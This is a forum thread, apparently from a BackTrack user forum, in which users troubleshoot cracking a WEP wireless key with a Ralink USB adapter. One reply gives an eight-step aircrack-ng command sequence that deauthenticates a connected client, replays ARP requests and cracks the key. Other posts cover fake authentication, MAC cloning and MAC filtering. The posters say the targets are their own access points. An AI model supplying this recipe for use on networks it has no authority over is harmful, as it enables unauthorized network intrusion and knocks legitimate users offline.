http://forums.remote-exploit.org/showthread.php?t=9063
Also, make certain that your wnic supports injection and is in monitor mode.
Wireless Cracking WEP + Slow gathering IV's
I have a rausb0 card and when i follower xplotiz tutorial everything works except when i try and crack the wep key.
For some reason i get IV's really slowly like 20 in 5 minutes.
Is this because my network does not have much traffic?
and if this is true how can i increase the traffic without logging into it?
http://forums.remote-exploit.org/showthread.php?t=9063
Also, make certain that your wnic supports injection and is in monitor mode.
Many factors can slow you down. Your proximity to the access point is one. Another rather foolish mistake I have made in the past is not specifying a channel. This will cause you to collect the packets you want intermittently slowing you down greatly. And to continue with what GunMonkey asked, what is the result of the following command:
Code:bt ~ # aireplay-ng -9 rausb0
Thanks for your replay. I think my problem is just there is no traffic so i have to wait awhile
As long as there is one client associated with that network you can gather enough IVs to crack it in say...under a minute. What you need to do (which I am sure is explained clearly in the tutorial) is find the client associated with the AP and de-authenticate him\her. This will force the reconnect and allow you to replay the ARP requests that follow next. Here are the EXACT steps I used to crack my WEP.
NOTE: It may be necessary to set your MAC to that of the client you wish to disassociate from the AP. It was not necessary for me and I don't really see why it would be but others claim it is.Code:1: bt ~ # ifconfig rausb0 up 2: bt ~ # iwconfig rausb0 mode monitor channel *channel* rate 1m 3: bt ~ # iwpriv rausb0 forceprism 1 4: bt ~ # iwpriv rausb0 rfmontx 1 5: bt ~ # airodump-ng --channel *channel* -b *00:bssid:00* -w *capfile* rausb0 6: bt ~ # aireplay-ng -0 5 -a *00:bssid:00* -c *00:client mac:00* rausb0 7: bt ~ # aireplay-ng --arpreplay -b *00:bssid:00* -h *mac of associated client* rausb0 8: bt ~ # aircrack-ng -z -b *00:bssid:00* *capfile*.cap
Obviously the starred text are variables, set them to the appropriate values. Lines 1-4 put a Ralink USB dongle into monitor mode assuming you are using the correct drivers and configuration (line 4 is important for the replay attack). Backtrack 2 does NOT have the right configuration for Ralink by default (BT3b does).
Keep in mind I was about 4 feet away from the router so obviously the signal strength was not a limiting factor.
Let me know how this works out for you.
Hello,
i have a rausb device too but i`m having dificulties in cracking wep ..meaning my auth/deauth is not working ...i`m next to my ap wich is a d-link and when i type :
aireplay-ng -1 0 -a (bssid) -h (mac adress of client) rausb0 it says :
Sending autentication request (Open System) a few times and then :
Attack was unsuccessful ..
1.i`m very close to the ap so distance isn`t a problem
card supports injection
i think mac filtering is off but if it was on couldn`t i still auth/deauth using a cloned mac ?
i`ll look in the d`link`s settings and see if filtering is on or off ..
also tried the wesside-ng but i get the error max retransmits for 30 bytes and wheni tried the -k 1 solution it says invalid option --k ......
I think you problem is it is ment to goOriginally Posted by ne0_ang3lz
aireplay-ng -1 0 -a (mac address of cilent) -h (Your rausb0 mac address) rausb0
Ok so what are the errors you are getting when you type in the commands I posted? You are using the commands I posted, aren't you?
Which Backtrack are you using? 2 or 3b? If you are using 2 see this thread.
You "think mac filtering is off?" Haha, it's your AP, so log in and check it out. Turn it off if it is giving you a problem and see how you do without it.
i am using the correct commands ...
yes it is my AP , but i didn`t know where mac filtering was that`s why i said i don`t know for shure ...i watched the settings more carefully and the macfilter was on , i turned it off and now it works ...but i get iv`s really slowly and there arren`t enough to crack the wep key ...i`ll put something to download on my client and make some traffic and see how that goes ...
Or u can wait 10 mins and it will have enough
Posting Permissions
